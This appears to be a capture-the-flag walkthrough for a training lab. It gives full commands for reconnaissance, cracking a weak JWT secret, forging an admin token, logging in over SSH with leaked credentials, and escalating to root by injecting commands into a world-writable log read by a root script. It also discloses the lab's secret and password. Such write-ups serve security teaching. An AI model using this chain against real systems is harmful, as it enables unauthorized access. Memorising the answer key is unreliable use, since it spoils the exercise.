CyberSec Corp's new vulnerability management platform claims to have enterprise-grade security measures in place. They're confident in their defenses and believe their system is impenetrable. 🛡️ Your mission: conduct a comprehensive security assessment and see if their confidence is justified!
Launch your dedicated AWS machine to begin hacking
Start by exploring the target application to understand the attack surface using comprehensive reconnaissance tools:
# Comprehensive port scan
nmap -sC -sV -p- <target-ip>
# Service enumeration
nmap -sC -sV -p 22,80 <target-ip>
# Expected results:
# 22/tcp open ssh OpenSSH
# 80/tcp open http Werkzeug/Flask
# Directory enumeration
gobuster dir -u http://<target-ip> -w /usr/share/wordlists/dirb/common.txt
# Technology detection
whatweb http://<target-ip>
# Manual exploration
curl -I http://<target-ip>
Navigate to http://<target-ip> and explore available functionality: login (/login), signup (/signup), dashboard (/dashboard), and admin (/admin) endpoints.
The application uses JWT tokens for authentication. Create a user account and analyze the JWT structure:
# Register new user
curl -X POST http://<target-ip>/signup \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=testuser&password=testpass123" \
-c cookies.txt
# Login to get JWT token
curl -X POST http://<target-ip>/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=testuser&password=testpass123" \
-c cookies.txt -L
# Extract JWT from cookies
cat cookies.txt | grep jwt
# Or using browser dev tools:
# F12 → Application → Cookies → jwt
# Decode JWT structure at jwt.io
# Or using command line:
echo "JWT_TOKEN_HERE" | cut -d. -f2 | base64 -d
Discover the JWT secret through various attack methods:
# Save JWT to file
echo "JWT_TOKEN" > jwt.txt
# Brute force with hashcat
hashcat -a 0 -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
# Common secrets wordlist
hashcat -a 0 -m 16500 jwt.txt /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt
# Convert JWT for John
python3 /usr/share/john/jwt2john.py JWT_TOKEN > jwt.hash
# Crack with John
john jwt.hash --wordlist=/usr/share/wordlists/rockyou.txt
# Show cracked password
john --show jwt.hash
# Test common secrets
# secret, key, password, admin
# 123456, secret123, !!!secret!!!
# The actual secret is: !!!secret!!!
# This can be found through systematic testing
Create a forged JWT token with admin privileges using the discovered secret:
# Install PyJWT if needed
pip3 install PyJWT
# Create forged admin token
python3 -c "
import jwt
import datetime
payload = {
'username': 'admin',
'role': 'admin',
'exp': int((datetime.datetime.utcnow() + datetime.timedelta(hours=24)).timestamp())
}
token = jwt.encode(payload, '!!!secret!!!', algorithm='HS256')
print('Forged JWT:', token)
"
# Using jwt.io:
# 1. Paste original JWT in Encoded section
# 2. Modify payload:
# "username": "admin"
# "role": "admin"
# 3. Enter secret: !!!secret!!!
# 4. Copy the new encoded JWT
Use the forged JWT token to access the admin panel and discover SSH credentials:
# Using browser dev tools:
# 1. F12 → Application → Cookies
# 2. Replace jwt cookie value with forged token
# 3. Navigate to http://<target-ip>/admin
# 4. Observe SSH credentials displayed
# Access admin panel with forged JWT
curl -X GET http://<target-ip>/admin \
-H "Cookie: jwt=FORGED_JWT_TOKEN_HERE" \
-L
# Extract credentials from response:
# Username: ctf
# Password: gzCxliaIr26MDS3ppbRSnCrNgOcR5ppM
Use the discovered credentials to gain SSH access and retrieve the first flag:
# Connect via SSH
ssh ctf@<target-ip>
# Password: gzCxliaIr26MDS3ppbRSnCrNgOcR5ppM
# Alternative with sshpass
sshpass -p 'gzCxliaIr26MDS3ppbRSnCrNgOcR5ppM' ssh ctf@<target-ip>
Once logged in via SSH, retrieve the user flag:
# Retrieve the first flag
ls -la
cat flag-user.txt
# Expected output: First flag obtained!
# This completes the user-level compromise
# Basic system information
whoami
id
uname -a
cat /etc/os-release
# Process enumeration
ps aux
ps aux | grep -v "\["
# File system exploration
ls -la /
ls -la /var/log/
find / -writable 2>/dev/null | head -20
Discover the log watcher script and identify the log injection vulnerability:
# Check running processes
ps aux | grep -i log
ps aux | grep -i watch
ps aux | grep -i bash
# Look for suspicious scripts
find /usr/local/bin -name "*log*" 2>/dev/null
find /usr/local/bin -type f -executable 2>/dev/null
# Examine log watcher script
cat /usr/local/bin/log_watcher.sh
# Examine log directory
ls -la /var/log/
ls -la /var/log/custom.log
# Check file permissions (critical!)
stat /var/log/custom.log
# Expected: -rw-rw-rw- (world writable)
# Test write access
echo "test" >> /var/log/custom.log
tail /var/log/custom.log
Exploit the log watcher script that executes commands from the log file to escalate privileges and obtain the root flag:
# Test command execution
echo "whoami > /tmp/test1.txt" >> /var/log/custom.log
echo "id > /tmp/test2.txt" >> /var/log/custom.log
echo "date > /tmp/test3.txt" >> /var/log/custom.log
# Wait 30-60 seconds for execution
sleep 60
# Check if commands executed
ls -la /tmp/test*.txt
cat /tmp/test1.txt
cat /tmp/test2.txt
Copy root flag to accessible location:
# Copy root flag to accessible location
echo "cp /root/flag-root.txt /tmp/root-flag.txt" >> /var/log/custom.log
echo "chmod 644 /tmp/root-flag.txt" >> /var/log/custom.log
echo "chown ctf:ctf /tmp/root-flag.txt" >> /var/log/custom.log
# Wait for execution (30 second intervals)
sleep 60
# Retrieve root flag - MISSION COMPLETE!
cat /tmp/root-flag.txt
# Expected output: Second flag obtained!
# This completes the root-level compromise
Both flags have been successfully retrieved:
/home/ctf/flag-user.txt
- Retrieved via SSH access after JWT manipulation/root/flag-root.txt
- Retrieved via log injection privilege escalationAttack Chain Summary:
Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.